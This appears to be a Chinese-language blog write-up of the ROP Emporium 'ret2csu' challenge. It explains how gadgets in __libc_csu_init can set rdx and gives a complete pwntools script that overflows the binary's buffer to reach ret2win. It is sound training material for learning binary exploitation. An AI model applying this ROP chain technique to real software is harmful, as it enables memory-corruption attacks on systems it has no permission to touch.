前言
这次会用到Blackhat2018议题(return to csu)
操作
来到第八关
题目提示
没有合适的rop gadgets,该如何在没有pop rdx的情况下写入rdx呢
先看一下基本信息
载入r2
main没有什么值得注意的地方,我们直接看
pwnme的
可以看到要求rdx必须是指定的字符串
和ret2win的
我们先看看ropgadget
可以看到和rdx相关的只有
没有pop rdx,或mov rdx
所以理论上我们无法绕过关卡的限制,无法设置该寄存器
此时的解决方案是return to csu,这是blackhat 2018的议题,通过一个通用的gadget来制作rop
在afl命令的输出中我们看到有一个函数,名为__libc_csu_init
我们反汇编看看
在其中我们找到了两个gadget
第一个:
第二个:
rdi是第一个参数,rsi是第二个参数,rdx是第三个参数
结合这两个gadget我们知道,rdi来自r13,rsi来自r14,rdx来自r15
前面提到我们要写0xdeadcafebabebeef到rdx,而从0x00400880可以看到写入r15就可以了。通过mov rdx,r15即可实现目的。
但是我们注意到第一个问题是第二个gadget的最后一条不是ret,而是call
call qword ptr [r12+rbx*8],由前可知,r12,rbx都是可控的,所以这个地址是可控的,不过为了控制目的地我们需要rbx和r12,这具体的值是什么呢?
注意到
第二个gadget后面是上图的三条指令
在cmp之前,rbx+1了,所以简单起见,我们设置rbx为0,rbp为1,这样cmp得到的结果就是相等
后面紧接着就是add rsp,8
我们知道rsp 是堆栈指针寄存器,通常会指向栈顶位置,堆栈的 pop 和push 操作就是通过改变 rsp 的值即移动堆栈指针的位置来实现的
这里的指令相当于增加了栈空间,我们可以随意填充相应大小即可
在上面我们设置了rbx为0,所以call的地址就是r12指定了
但是直接把ret2win的地址放入r12会报SIGSEGV
而为了有效地使用mov rdx,r15,我们必须确保调用QWORD PTR [r12 + rbx * 8]不是SIGSEGV,cmp rbx,rbp相等且最重要的是RDX的值不会改变。
根据这篇文章(https://www.voidsecurity.in/2013/07/some-gadget-sequence-for-x8664-rop.html)描述的技巧,我们可以尝试调用__inti()函数,通过DYNAMIC变量定位
因为__init使用0x400560地址,我们的指针就是0x600e38
这些操作完成后,我们就可以正常地在栈上放入ret2win的地址
总结下我们做了哪些事情:
首先调用第一个gadget,地址是0x40089a
将需要的值放在栈上
r12寄存器上是指向__init地址的指针
r15寄存器是0xdeadcafebabebeef
rbx寄存器是0x0
rbp寄存器是0x1
第二个gadget地址是0x400880
因为有add rsp,8所以我们需要进行一些填充
将ret2win的值放在栈上
完整的代码在8.py
from pwn import *
ret2win_adr = 0x4007b1
first_gadget_adr = 0x40089a
second_gadget_adr = 0x400880
init_pointer = 0x600e38
payload = b"A" * 40
payload += p64(first_gadget_adr)
payload += p64(0x00) # pop rbx
payload += p64(0x01) # pop rbp
payload += p64(init_pointer) # pop r12
payload += p64(0x00) # pop r13
payload += p64(0x00) # pop r14
payload += p64(0xdeadcafebabebeef) # pop r15
payload += p64(second_gadget_adr)
payload += p64(0x00) # add rsp,0x8 padding
payload += p64(0x00) # rbx
payload += p64(0x00) # rbp
payload += p64(0x00) # r12
payload += p64(0x00) # r13
payload += p64(0x00) # r14
payload += p64(0x00) # r15
payload += p64(ret2win_adr)
ret2csu = process('./ret2csu')
ret2csu.readuntil('>')
ret2csu.sendline(payload)
output = ret2csu.readall()
print(output)
运行如图
注
题目来自ROPEmporium,另参考如下资源:
https://medium.com/@int0x33/
https://paper.seebug.org/272/
https://www.rootnetsec.com/
https://bestwing.me/ropemporium-all-writeup.html
https://firmianay.github.io/2017/11/02/rop_emporium.html
https://www.oipapio.com/cn/article-5389490
http://ascii.911cha.com/
https://www.bejson.com/convert/ox2str/
https://larry.ngrep.me/2018/06/14/rop-emporium-write-up/
https://www.voidsecurity.in/2013/07/some-gadget-sequence-for-x8664-rop.html
https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR.pdf
https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf
https://www.jianshu.com/p/a9ad38ad33e5
https://zhuanlan.zhihu.com/p/27339191
https://www.voidsecurity.in/2013/07/some-gadget-sequence-for-x8664-rop.html
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
